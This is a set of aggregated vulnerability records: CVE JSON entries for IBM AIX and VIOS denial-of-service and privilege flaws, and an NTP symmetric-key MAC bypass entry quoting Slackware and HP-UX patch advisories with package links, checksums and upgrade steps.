https://exchange.xforce.ibmcloud.com/vulnerabilities/235183 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T11:10:32.609Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235183" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 235183." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 235183." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T18:48:01.722Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235183" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-39165", "datePublished": "2022-12-23T18:48:01.722Z", "dateReserved": "2022-09-01T20:20:58.939Z", "dateUpdated": "2024-08-03T11:10:32.609Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29727
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6483875 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/201106 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:02.518Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129727-dos (201106)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201106" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2021-08-25T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 201106." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/I:N/C:N/AC:L/AV:L/UI:N/A:H/PR:N/S:U/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-08-26T19:25:24", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129727-dos (201106)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201106" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-08-25T00:00:00", "ID": "CVE-2021-29727", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 201106." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6483875", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6483875 (AIX)", "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129727-dos (201106)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201106" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29727", "datePublished": "2021-08-26T19:25:24.374464Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-17T01:56:39.040Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-4948
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www-01.ibm.com/support/docview.wss?uid=swg1IV77299 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/netstat_advisory.asc | x_refsource_CONFIRM | |
http://www.securitytracker.com/id/1033806 | vdb-entry, x_refsource_SECTRACK | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV75940 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T06:32:31.349Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV77299", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV77299" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/netstat_advisory.asc" }, { "name": "1033806", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1033806" }, { "name": "IV75940", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV75940" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2015-10-12T00:00:00", "descriptions": [ { "lang": "en", "value": "netstat in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x, when a fibre channel adapter is used, allows local users to gain privileges via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-06T18:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "IV77299", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV77299" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/netstat_advisory.asc" }, { "name": "1033806", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1033806" }, { "name": "IV75940", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV75940" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2015-4948", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "netstat in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x, when a fibre channel adapter is used, allows local users to gain privileges via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV77299", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV77299" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/netstat_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/netstat_advisory.asc" }, { "name": "1033806", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1033806" }, { "name": "IV75940", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV75940" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2015-4948", "datePublished": "2015-10-16T01:00:00", "dateReserved": "2015-06-24T00:00:00", "dateUpdated": "2024-08-06T06:32:31.349Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45167
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7068084 | vendor-advisory | |
https://aix.software.ibm.com/aix/efixes/security/python_advisory6.asc | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267965 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.770Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7068084" }, { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://aix.software.ibm.com/aix/efixes/security/python_advisory6.asc" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267965" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-45167", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-03T17:41:12.441231Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-03T17:42:37.442Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.3" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX\u0027s 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service. IBM X-Force ID: 267965." } ], "value": "IBM AIX\u0027s 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service. IBM X-Force ID: 267965." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-10T03:52:10.595Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7068084" }, { "tags": [ "vendor-advisory" ], "url": "https://aix.software.ibm.com/aix/efixes/security/python_advisory6.asc" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267965" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45167", "datePublished": "2023-11-10T03:52:10.595Z", "dateReserved": "2023-10-05T01:38:44.721Z", "dateUpdated": "2024-09-03T17:42:37.442Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45173
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7105282 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267971 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.764Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267971" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the NFS kernel extension to cause a denial of service. IBM X-Force ID: 267971." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the NFS kernel extension to cause a denial of service. IBM X-Force ID: 267971." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T01:59:38.562Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267971" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45173", "datePublished": "2024-01-11T01:59:38.562Z", "dateReserved": "2023-10-05T01:38:44.722Z", "dateUpdated": "2024-08-02T20:14:19.764Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38955
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6560236 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/211825 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:51:20.734Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6560236" }, { "name": "ibm-aix-cve202138955-dos (211825)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/211825" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-02-28T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a local user with elevated privileges to cause a denial of service due to a file creation vulnerability in the audit commands. IBM X-Force ID: 211825." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.9, "temporalSeverity": "LOW", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:H/UI:N/AV:L/C:N/PR:H/I:N/S:U/AC:L/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-01T16:45:24", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6560236" }, { "name": "ibm-aix-cve202138955-dos (211825)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/211825" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-02-28T00:00:00", "ID": "CVE-2021-38955", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a local user with elevated privileges to cause a denial of service due to a file creation vulnerability in the audit commands. IBM X-Force ID: 211825." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "H", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6560236", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6560236 (AIX)", "url": "https://www.ibm.com/support/pages/node/6560236" }, { "name": "ibm-aix-cve202138955-dos (211825)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/211825" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38955", "datePublished": "2022-03-01T16:45:24.203180Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-16T23:50:37.182Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
var-201504-0361
Vulnerability from variot
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. Successful exploits may allow the attacker to cause a denial-of-service condition. NTP is prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: e6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: c436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: cf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: 9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz
Slackware -current package: 5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz
Slackware x86_64 -current package: 1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
Release Date: 2015-05-19 Last Updated: 2015-05-19
Potential Security Impact: Remote Denial of Service (DoS), or other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running NTP. These could be exploited remotely to create a Denial of Service (DoS), or other vulnerabilities.
References:
CVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17) CVE-2015-1799 - Symmetric-Key feature allows denial of service (CWE-17) SSRT102029 CERT-VU#852879
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8 CVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following solution for HP-UX B.11.31.
A new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPUX-NTP
Reference: http://support.ntp.org/bin/view/Main/SecurityNotice
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.6.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 May 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
